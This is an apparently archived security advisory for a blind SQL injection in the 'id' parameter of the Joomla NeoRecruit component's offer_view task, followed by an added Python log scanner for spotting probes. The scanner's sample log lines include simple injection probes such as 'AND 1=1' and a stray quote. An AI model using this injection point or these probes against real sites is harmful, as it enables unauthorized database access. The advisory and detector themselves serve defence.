Vendor: NeoRecruit
By: ajann
CVSS: 7.5 HIGH
Remote Blind SQL Injection
CWE: 89
Product Name: NeoRecruit
Affected Version From: 1
Affected Version To: 1.4
Patch Exists: NO
Related CWE:
CPE: a:neojoomla:neorecruit:1.4
Platforms Tested:
2007
Joomla Component NeoRecruit <= 1.4 (id) Remote Blind SQL Injection Vulnerability
The Joomla component NeoRecruit, version 1.4 and below, is vulnerable to remote blind SQL injection. An attacker can exploit it by injecting SQL code into the 'id' parameter of the 'offer_view' task in the 'com_neorecruit' component. This can lead to unauthorized access to the database, potentially exposing sensitive information.
Mitigation:
The vendor has not provided a patch for this vulnerability. To mitigate this issue, it is recommended to remove or disable the vulnerable component from the Joomla installation.
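An added example, not part of the original advisory or the component's code: a Python check that scans web server access log lines for requests to the 'offer_view' task of 'com_neorecruit' whose 'id' is not a plain integer, which helps find past probing while the component is still installed. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_offer_view(log_line):
    """Return the decoded 'id' value when the line is a com_neorecruit
    offer_view request whose id is not a plain integer; otherwise None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    # parse_qs percent-decodes values, so encoded input is checked decoded.
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if query.get("option", [""])[-1].lower() != "com_neorecruit":
        return None
    if query.get("task", [""])[-1].lower() != "offer_view":
        return None
    for value in query.get("id", []):
        if not re.fullmatch(r"[0-9]{1,10}", value):
            return value
    return None

def scan(lines):
    """Return (line number, client address, decoded id) for each flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_offer_view(line)
        if value is not None:
            hits.append((number, line.split()[0], value))
    return hits

# Constructed sample lines (documentation addresses), not taken from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /index.php?option=com_neorecruit&task=offer_view&id=7 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [01/Jan/2007:10:00:05 +0000] "GET /index.php?option=com_neorecruit&task=offer_view&id=7%20AND%201%3D1 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [01/Jan/2007:10:00:06 +0000] "GET /index.php?option=com_neorecruit&task=offer_view&id=7%27 HTTP/1.1" 200 312',
    '192.0.2.10 - - [01/Jan/2007:10:00:09 +0000] "GET /index.php?option=com_content&task=view&id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only query-string parameters appear in access logs; requests that carry the parameters in a POST body need application-level or WAF logging to be seen.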